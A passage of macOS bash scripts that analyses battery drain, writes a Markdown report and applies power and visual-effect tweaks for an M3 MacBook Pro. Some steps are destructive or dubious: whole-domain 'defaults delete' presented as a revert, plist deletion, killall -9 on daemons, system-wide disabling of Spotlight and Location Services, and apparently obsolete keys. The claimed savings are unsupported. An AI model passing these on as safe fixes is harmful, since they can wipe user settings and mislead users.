        if [[ -z "$CPU_USAGE" ]]; then
            CPU_USAGE="0"
        fi
        
        # Determine impact level
        # Use awk for floating point comparison
        if awk "BEGIN {exit !($CPU_USAGE > 20.0)}" 2>/dev/null; then
            IMPACT="HIGH ⚠️"
        elif awk "BEGIN {exit !($CPU_USAGE > 5.0)}" 2>/dev/null; then
            IMPACT="MEDIUM"
        else
            IMPACT="LOW"
        fi
        
        echo "| $display_name | Running (${CPU_USAGE}% CPU) | $IMPACT |" >> "$REPORT_FILE"
    fi
done

# 9. Battery health check
echo "Checking battery health..."
cat >> "$REPORT_FILE" << EOF

## 🔋 Battery Health Status

\`\`\`
EOF
system_profiler SPPowerDataType | grep -A 20 "Battery Information:" >> "$REPORT_FILE"
echo '```' >> "$REPORT_FILE"

# 10. Recommendations
cat >> "$REPORT_FILE" << EOF

## 💡 Recommendations

### Immediate Actions to Improve Battery Life

#### Critical (Do These First):
EOF

# Generate recommendations based on findings
if [[ "$POWERNAP" == "1" ]]; then
    cat >> "$REPORT_FILE" << EOF
1. **Disable Power Nap**
   \`\`\`bash
   sudo pmset -a powernap 0
   \`\`\`
EOF
fi

if [[ "$TCPKEEPALIVE" == "1" ]]; then
    cat >> "$REPORT_FILE" << EOF
2. **Disable TCP Keep-Alive**
   \`\`\`bash
   sudo pmset -a tcpkeepalive 0
   \`\`\`
EOF
fi

if [[ "$WOMP" == "1" ]]; then
    cat >> "$REPORT_FILE" << EOF
3. **Disable Wake for Network Access**
   \`\`\`bash
   sudo pmset -a womp 0
   \`\`\`
EOF
fi

cat >> "$REPORT_FILE" << EOF

#### Additional Optimizations:
4. **Reduce Display Sleep Time**
   \`\`\`bash
   sudo pmset -a displaysleep 5
   \`\`\`

5. **Enable Automatic Graphics Switching** (if available)
   \`\`\`bash
   sudo pmset -a gpuswitch 2
   \`\`\`

6. **Set Faster Standby Delay**
   \`\`\`bash
   sudo pmset -a standbydelay 1800  # 30 minutes
   \`\`\`

### Process-Specific Recommendations:
EOF

# Check for specific high-drain processes and provide detailed solutions
if pgrep -q "mds_stores" 2>/dev/null; then
    cat >> "$REPORT_FILE" << EOF
#### 🔍 **Spotlight Indexing Detected**
**Problem:** Spotlight is actively indexing your drive, consuming significant CPU and battery.
**Solutions:**
- **Temporary pause:** \`sudo mdutil -a -i off\` (re-enable with \`on\`)
- **Check indexing status:** \`mdutil -s /\`
- **Rebuild index if stuck:** \`sudo mdutil -E /\`
- **Exclude folders:** System Settings > Siri & Spotlight > Spotlight Privacy

EOF
fi

if pgrep -q "backupd" 2>/dev/null; then
    cat >> "$REPORT_FILE" << EOF
#### 💾 **Time Machine Backup Running**
**Problem:** Active backup consuming resources.
**Solutions:**
- **Skip current backup:** Click Time Machine icon > Skip This Backup
- **Schedule for AC power:** \`sudo defaults write /Library/Preferences/com.apple.TimeMachine RequiresACPower -bool true\`
- **Reduce backup frequency:** Use TimeMachineEditor app
- **Check backup size:** \`tmutil listbackups | tail -1 | xargs tmutil calculatedrift\`

EOF
fi

if pgrep -q "photoanalysisd" 2>/dev/null; then
    cat >> "$REPORT_FILE" << EOF
#### 📸 **Photos Library Analysis Active**
**Problem:** Photos app analyzing images for faces, objects, and scenes.
**Solutions:**
- **Pause temporarily:** Quit Photos app completely
- **Disable features:** Photos > Settings > uncheck "Enable Machine Learning"
- **Process overnight:** Leave Mac plugged in overnight to complete
- **Check progress:** Activity Monitor > Search "photo"

EOF
fi

# Check for additional common issues
if pgrep -q "kernel_task" 2>/dev/null && [[ $(ps aux | grep "kernel_task" | grep -v grep | awk '{print $3}' | cut -d. -f1) -gt 50 ]]; then
    cat >> "$REPORT_FILE" << EOF
#### 🔥 **High kernel_task CPU Usage**
**Problem:** System thermal management or driver issues.
**Solutions:**
- **Reset SMC:** Shut down > Press & hold Shift-Control-Option-Power for 10s
- **Check temperatures:** \`sudo powermetrics --samplers smc | grep temp\`
- **Disconnect peripherals:** Especially USB-C hubs and external displays
- **Update macOS:** Check for system updates
- **Safe mode test:** Restart holding Shift key

EOF
fi

if pgrep -q "WindowServer" 2>/dev/null && [[ $(ps aux | grep "WindowServer" | grep -v grep | awk '{print $3}' | cut -d. -f1) -gt 30 ]]; then
    cat >> "$REPORT_FILE" << EOF
#### 🖥️ **High WindowServer Usage**
**Problem:** Graphics rendering issues or display problems.
**Solutions:**
- **Reduce transparency:** System Settings > Accessibility > Display > Reduce transparency
- **Close visual apps:** Quit apps with animations or video
- **Reset display settings:** Option-click Scaled in Display settings
- **Disable display sleep prevention:** \`pmset -g assertions | grep -i display\`

EOF
fi

# 11. Battery drain score
echo "Calculating battery drain score..."
cat >> "$REPORT_FILE" << EOF

## 📈 Overall Battery Drain Score

EOF

# Calculate score (0-100, where 100 is worst)
SCORE=0
[[ "$POWERNAP" == "1" ]] && SCORE=$((SCORE + 30))
[[ "$TCPKEEPALIVE" == "1" ]] && SCORE=$((SCORE + 15))
[[ "$WOMP" == "1" ]] && SCORE=$((SCORE + 10))

# Add points for running services
pgrep -q "mds_stores" 2>/dev/null && SCORE=$((SCORE + 10))
pgrep -q "backupd" 2>/dev/null && SCORE=$((SCORE + 10))
pgrep -q "photoanalysisd" 2>/dev/null && SCORE=$((SCORE + 5))
pgrep -q "falcon" 2>/dev/null && SCORE=$((SCORE + 10))

# Determine rating
if [[ $SCORE -lt 20 ]]; then
    RATING="✅ **EXCELLENT** - Minimal battery drain expected"
elif [[ $SCORE -lt 40 ]]; then
    RATING="👍 **GOOD** - Some optimization possible"
elif [[ $SCORE -lt 60 ]]; then
    RATING="⚠️ **FAIR** - Noticeable battery drain"
else
    RATING="❌ **POOR** - Significant battery drain"
fi

cat >> "$REPORT_FILE" << EOF
**Battery Drain Score: $SCORE/100**  
**Rating: $RATING**

Higher scores indicate more battery drain. A score above 40 suggests optimization is needed.

---

## 📝 How to Use This Report

1. Review the **Executive Summary** for quick insights
2. Check **Problematic Settings** and apply recommended fixes
3. Identify high CPU processes in the **Top Battery-Draining Processes** section
4. Follow the **Recommendations** in order of priority
5. Re-run this script after making changes to measure improvement

## 🛠️ Common Battery Issues & Solutions

### 🔴 Critical Issues (Fix Immediately)

#### Sleep Prevention Issues
**Symptoms:** Mac won't sleep, battery drains with lid closed
**Diagnosis:** \`pmset -g assertions\`
**Solutions:**
- Kill preventing apps: \`pmset -g assertions | grep -i prevent\`
- Force sleep: \`pmset sleepnow\`
- Reset power management: \`sudo pmset -a restoredefaults\`

#### Runaway Processes
**Symptoms:** Fan running constantly, Mac gets hot, rapid battery drain
**Diagnosis:** \`top -o cpu\` or Activity Monitor
**Solutions:**
- Force quit: \`kill -9 [PID]\` or Activity Monitor > Force Quit
- Disable startup items: System Settings > General > Login Items
- Clean launch agents: \`ls ~/Library/LaunchAgents\`

### 🟡 Common Issues

#### Bluetooth Battery Drain
**Problem:** Bluetooth constantly searching for devices
**Solutions:**
- Reset Bluetooth module: Shift+Option click BT icon > Reset
- Remove unused devices: System Settings > Bluetooth
- Disable when not needed: \`sudo defaults write /Library/Preferences/com.apple.Bluetooth ControllerPowerState 0\`

#### Safari/Chrome High Energy Use
**Problem:** Browser tabs consuming excessive resources
**Solutions:**
- Use Safari over Chrome (more efficient on Mac)
- Install ad blockers to reduce JavaScript load
- Limit tabs: Use OneTab or similar extension
- Disable auto-play: Safari > Settings > Websites > Auto-Play

#### External Display Issues
**Problem:** Discrete GPU activation draining battery
**Solutions:**
- Use single display when on battery
- Lower resolution: System Settings > Displays
- Use clamshell mode efficiently
- Check GPU: \`pmset -g\` look for gpuswitch

#### Cloud Sync Services
**Problem:** Continuous syncing draining battery
**Solutions:**
- **iCloud:** System Settings > Apple ID > iCloud > Optimize Mac Storage
- **Dropbox:** Pause sync or use selective sync
- **OneDrive:** Pause syncing when on battery
- **Google Drive:** File Stream > Preferences > Bandwidth settings

### 🟢 Preventive Measures

#### Daily Habits
- Close apps instead of just minimizing
- Disconnect peripherals when not in use
- Use Safari for better battery life
- Enable Low Power Mode when unplugged
- Reduce screen brightness (saves 10-20% battery)

#### Weekly Maintenance
- Restart Mac weekly to clear memory
- Check Activity Monitor for unusual processes
- Update apps and macOS regularly
- Clear browser cache and cookies
- Review login items and launch agents

#### Monthly Checks
- Calibrate battery (full discharge and charge)
- Clean fans and vents for better cooling
- Review and remove unused apps
- Check storage (full drives impact performance)
- Run Disk Utility First Aid

### Quick Fix Scripts

#### 🚀 Basic Optimization (Safe)
Save and run this script to apply all recommended power optimizations:

\`\`\`bash
#!/bin/bash
# Apply all power optimizations
sudo pmset -a powernap 0
sudo pmset -a tcpkeepalive 0
sudo pmset -a womp 0
sudo pmset -a standbydelay 1800
sudo pmset -a displaysleep 5
sudo pmset -a hibernatemode 3
sudo pmset -a autopoweroff 1
sudo pmset -a autopoweroffdelay 28800
echo "Power optimizations applied!"
\`\`\`

#### 💪 Aggressive Battery Saving
For maximum battery life (may affect convenience):

\`\`\`bash
#!/bin/bash
# Aggressive battery saving settings
sudo pmset -b displaysleep 2
sudo pmset -b disksleep 10
sudo pmset -b sleep 5
sudo pmset -b powernap 0
sudo pmset -b tcpkeepalive 0
sudo pmset -b womp 0
sudo pmset -b ttyskeepawake 0
sudo pmset -b gpuswitch 0  # Force integrated GPU
sudo pmset -b hibernatemode 25  # Hibernate only mode
echo "Aggressive battery settings applied!"
\`\`\`

#### 🔄 Reset to Defaults
To restore factory power settings:

\`\`\`bash
#!/bin/bash
sudo pmset -a restoredefaults
echo "Power settings restored to defaults"
\`\`\`

---

*Report generated by Battery Drain Analyzer v1.0*
EOF

# Cleanup
rm -rf "$TEMP_DIR"

# Summary
echo ""
echo -e "${GREEN}✅ Analysis Complete!${NC}"
echo "Report saved to: $REPORT_FILE"
echo ""
echo "Key findings:"
[[ "$POWERNAP" == "1" ]] && echo -e "${RED}  ❌ Power Nap is enabled (HIGH drain)${NC}"
[[ "$TCPKEEPALIVE" == "1" ]] && echo -e "${YELLOW}  ⚠️ TCP Keep-Alive is enabled (MEDIUM drain)${NC}"
[[ "$WOMP" == "1" ]] && echo -e "${YELLOW}  ⚠️ Wake on LAN is enabled (MEDIUM drain)${NC}"
echo ""
echo "To view the full report:"
echo "  cat $REPORT_FILE"
echo ""
echo "To apply all recommended fixes:"
echo "  sudo pmset -a powernap 0 tcpkeepalive 0 womp 0"

SCRIPT_EOF

chmod +x ~/battery_drain_analyzer.sh
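
After a run, the newest report can be pulled up straight from the shell (the filename pattern comes from the REPORT_FILE variable at the top of the script; reports land in whatever directory you ran it from):

cat "$(ls -t battery_drain_report_*.md | head -1)"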

If you see WindowServer as your top consumer, then consider the following:

# 1. Restart WindowServer (logs you out!)
sudo killall -HUP WindowServer

# 2. Reduce transparency
defaults write com.apple.universalaccess reduceTransparency -bool true

# 3. Disable animations
defaults write NSGlobalDomain NSAutomaticWindowAnimationsEnabled -bool false

# 4. Reset display preferences
rm ~/Library/Preferences/com.apple.windowserver.plist
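
Before (and after) applying any of these, it is worth confirming WindowServer really is the top consumer; a quick check (the bracketed [W] stops grep from matching its own process):

ps aux | grep "[W]indowServer" | awk '{print $3 "% CPU"}'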

Finer grained optimisations:

#!/bin/bash

echo "🔧 Applying ALL WindowServer Optimizations for M3 MacBook Pro..."
echo "This will reduce power consumption significantly"
echo ""

# ============================================
# VISUAL EFFECTS & ANIMATIONS (30-40% reduction)
# ============================================
echo "Disabling visual effects and animations..."

# Reduce transparency and motion
defaults write com.apple.universalaccess reduceTransparency -bool true
defaults write com.apple.universalaccess reduceMotion -bool true
defaults write com.apple.Accessibility ReduceMotionEnabled -int 1

# Disable smooth scrolling and window animations
defaults write NSGlobalDomain NSAutomaticWindowAnimationsEnabled -bool false
defaults write NSGlobalDomain NSScrollAnimationEnabled -bool false
defaults write NSGlobalDomain NSScrollViewRubberbanding -bool false
defaults write NSGlobalDomain NSWindowResizeTime -float 0.001
defaults write NSGlobalDomain NSDocumentRevisionsWindowTransformAnimation -bool false
defaults write NSGlobalDomain NSToolbarFullScreenAnimationDuration -float 0
defaults write NSGlobalDomain NSBrowserColumnAnimationSpeedMultiplier -float 0

# Dock optimizations
defaults write com.apple.dock autohide-time-modifier -float 0
defaults write com.apple.dock launchanim -bool false
defaults write com.apple.dock mineffect -string "scale"
defaults write com.apple.dock show-recents -bool false
defaults write com.apple.dock expose-animation-duration -float 0.1
defaults write com.apple.dock hide-mirror -bool true

# Mission Control optimizations
defaults write com.apple.dock expose-group-by-app -bool false
defaults write com.apple.dock mru-spaces -bool false
defaults write com.apple.dock dashboard-in-overlay -bool true

# Finder optimizations
defaults write com.apple.finder DisableAllAnimations -bool true
defaults write com.apple.finder AnimateWindowZoom -bool false
defaults write com.apple.finder AnimateInfoPanes -bool false
defaults write com.apple.finder FXEnableSlowAnimation -bool false

# Quick Look animations
defaults write -g QLPanelAnimationDuration -float 0

# Mail animations
defaults write com.apple.mail DisableReplyAnimations -bool true
defaults write com.apple.mail DisableSendAnimations -bool true

# ============================================
# M3-SPECIFIC OPTIMIZATIONS (10-15% reduction)
# ============================================
echo "Applying M3-specific optimizations..."

# Disable font smoothing (M3 handles text well without it)
defaults -currentHost write NSGlobalDomain AppleFontSmoothing -int 0
defaults write NSGlobalDomain CGFontRenderingFontSmoothingDisabled -bool true

# Optimize for battery when unplugged
sudo pmset -b gpuswitch 0  # Force the integrated/low-power GPU
sudo pmset -b lessbright 1 # Slightly dim display on battery
sudo pmset -b displaysleep 5  # Faster display sleep

# Reduce background rendering
defaults write NSGlobalDomain NSQuitAlwaysKeepsWindows -bool false
defaults write NSGlobalDomain NSDisableAutomaticTermination -bool true

# ============================================
# BROWSER OPTIMIZATIONS (15-25% reduction)
# ============================================
echo "Optimizing browsers..."

# Chrome optimizations
defaults write com.google.Chrome DisableHardwareAcceleration -bool true
defaults write com.google.Chrome CGDisableCoreAnimation -bool true
defaults write com.google.Chrome RendererProcessLimit -int 2
defaults write com.google.Chrome NSQuitAlwaysKeepsWindows -bool false

# Safari optimizations (more efficient than Chrome)
defaults write com.apple.Safari WebKitAcceleratedCompositingEnabled -bool false
defaults write com.apple.Safari WebKitWebGLEnabled -bool false
defaults write com.apple.Safari WebKit2WebGLEnabled -bool false

# Stable browser (if Chromium-based)
defaults write com.stable.browser DisableHardwareAcceleration -bool true

# ============================================
# ADVANCED WINDOWSERVER TWEAKS (5-10% reduction)
# ============================================
echo "Applying advanced WindowServer tweaks..."

# Reduce compositor update rate
defaults write com.apple.WindowManager StandardHideDelay -int 0
defaults write com.apple.WindowManager StandardHideTime -int 0
defaults write com.apple.WindowManager EnableStandardClickToShowDesktop -bool false

# Reduce shadow calculations
defaults write NSGlobalDomain NSUseLeopardWindowShadow -bool true

# Disable Dashboard
defaults write com.apple.dashboard mcx-disabled -bool true

# Menu bar transparency
defaults write NSGlobalDomain AppleEnableMenuBarTransparency -bool false

# ============================================
# DISPLAY SETTINGS (20-30% reduction)
# ============================================
echo "Optimizing display settings..."

# Enable automatic brightness adjustment
sudo defaults write /Library/Preferences/com.apple.iokit.AmbientLightSensor "Automatic Display Enabled" -bool true

# Power management settings
sudo pmset -a displaysleep 5           # display sleep after 5 minutes
sudo pmset -a disksleep 10             # disk sleep after 10 minutes
sudo pmset -a sleep 15                 # system sleep after 15 minutes
sudo pmset -a hibernatemode 3          # safe sleep: RAM stays powered, image also written to disk
sudo pmset -a autopoweroff 1           # allow the deeper auto-power-off state
sudo pmset -a autopoweroffdelay 28800  # enter it after 8 hours (value in seconds)

# ============================================
# BACKGROUND SERVICES
# ============================================
echo "Optimizing background services..."

# Reduce Spotlight activity
sudo mdutil -a -i off  # Temporarily disable, re-enable with 'on'

# Limit background app refresh
defaults write NSGlobalDomain NSAppSleepDisabled -bool false

# ============================================
# APPLY ALL CHANGES
# ============================================
echo "Applying changes..."

# Restart affected services
killall Dock
killall Finder
killall SystemUIServer
killall Mail 2>/dev/null
killall Safari 2>/dev/null
killall "Google Chrome" 2>/dev/null

echo ""
echo "✅ All optimizations applied!"
echo ""
echo "📊 Expected improvements:"
echo "  • WindowServer CPU: 4.5% → 1-2%"
echo "  • Battery life gain: +1-2 hours"
echo "  • GPU power reduction: ~30-40%"
echo ""
echo "⚠️  IMPORTANT: Please log out and back in for all changes to take full effect"
echo ""
echo "💡 To monitor WindowServer usage:"
echo "   ps aux | grep WindowServer | grep -v grep | awk '{print \$3\"%\"}'"
echo ""
echo "🔄 To revert all changes, run:"
echo "   defaults delete com.apple.universalaccess"
echo "   defaults delete NSGlobalDomain"
echo "   defaults delete com.apple.dock"
echo "   killall Dock && killall Finder"

To optimise power draw while the lid is closed, here are some options:

#!/bin/bash

echo "🔋 Applying CRITICAL closed-lid battery optimizations for M3 MacBook Pro..."
echo "These settings specifically target battery drain when lid is closed"
echo ""

# ============================================
# #1 HIGHEST IMPACT (50-70% reduction when lid closed)
# ============================================
echo "1️⃣ Disabling Power Nap (HIGHEST IMPACT - stops wake for updates)..."
sudo pmset -a powernap 0

echo "2️⃣ Disabling TCP Keep-Alive (HIGH IMPACT - stops network maintenance)..."
sudo pmset -a tcpkeepalive 0

echo "3️⃣ Disabling Wake for Network Access (HIGH IMPACT - prevents network wakes)..."
sudo pmset -a womp 0

# ============================================
# #2 HIGH IMPACT (20-30% reduction)
# ============================================
echo "4️⃣ Setting aggressive sleep settings..."
# When on battery, sleep faster and deeper
sudo pmset -b sleep 1                    # Sleep after 1 minute of inactivity
sudo pmset -b disksleep 5                # Spin down disk after 5 minutes
sudo pmset -b hibernatemode 25           # Hibernate only (no sleep+RAM power)
sudo pmset -b standbydelay 300           # Enter standby after 5 minutes
sudo pmset -b autopoweroff 1             # Enable auto power off
sudo pmset -b autopoweroffdelay 900      # Power off after 15 minutes

echo "5️⃣ Disabling wake features..."
sudo pmset -a ttyskeepawake 0           # Don't wake for terminal sessions
sudo pmset -a lidwake 0                  # Don't wake on lid open (until power button)
sudo pmset -a acwake 0                   # Don't wake on AC attach

# ============================================
# #3 MEDIUM IMPACT (10-20% reduction)
# ============================================
echo "6️⃣ Disabling background services that wake the system..."

# Disable Bluetooth wake
sudo defaults write /Library/Preferences/com.apple.Bluetooth.plist ControllerPowerState 0

# Disable Location Services wake
sudo defaults write /Library/Preferences/com.apple.locationd.plist LocationServicesEnabled -bool false

# Disable Find My wake events
sudo pmset -a proximityWake 0 2>/dev/null

# Disable Handoff/Continuity features that might wake
sudo defaults write com.apple.Handoff HandoffEnabled -bool false

# ============================================
# #4 SPECIFIC WAKE PREVENTION (5-10% reduction)
# ============================================
echo "7️⃣ Preventing specific wake events..."

# Disable scheduled wake events
sudo pmset repeat cancel

# Clear any existing scheduled events
sudo pmset schedule cancelall

# Disable DarkWake (background wake without display)
sudo pmset -a darkwakes 0 2>/dev/null

# Disable wake for Time Machine
sudo defaults write /Library/Preferences/com.apple.TimeMachine.plist RequiresACPower -bool true

# ============================================
# #5 BACKGROUND APP PREVENTION
# ============================================
echo "8️⃣ Stopping apps from preventing sleep..."

# Kill processes that commonly prevent sleep
killall -9 photoanalysisd 2>/dev/null
killall -9 mds_stores 2>/dev/null
killall -9 backupd 2>/dev/null

# Disable Spotlight indexing when on battery
sudo mdutil -a -i off

# Disable Photos analysis
launchctl disable user/$UID/com.apple.photoanalysisd

# ============================================
# VERIFY SETTINGS
# ============================================
echo ""
echo "✅ Closed-lid optimizations complete! Verifying..."
echo ""
echo "Current problematic settings status:"
pmset -g | grep -E "powernap|tcpkeepalive|womp|sleep|hibernatemode|standby|lidwake"

echo ""
echo "Checking what might still wake your Mac:"
pmset -g assertions | grep -i "prevent"

echo ""
echo "==============================================="
echo "🎯 EXPECTED RESULTS WITH LID CLOSED:"
echo "  • Battery drain: 1-2% per hour (down from 5-10%)"
echo "  • No wake events except opening lid + pressing power"
echo "  • Background services completely disabled"
echo ""
echo "⚠️ TRADE-OFFS:"
echo "  • No email/message updates with lid closed"
echo "  • No Time Machine backups on battery"
echo "  • Must press power button after opening lid"
echo "  • Handoff/AirDrop disabled"
echo ""
echo "🔄 TO RESTORE CONVENIENCE FEATURES:"
echo "sudo pmset -a powernap 1 tcpkeepalive 1 womp 1 lidwake 1"
echo "sudo pmset -b hibernatemode 3 standbydelay 10800"
echo "sudo mdutil -a -i on"
echo ""
echo "📊 TEST YOUR BATTERY DRAIN:"
echo "1. Note battery % and close lid"
echo "2. Wait 1 hour"
echo "3. Open and check battery %"
echo "4. Should lose only 1-2%"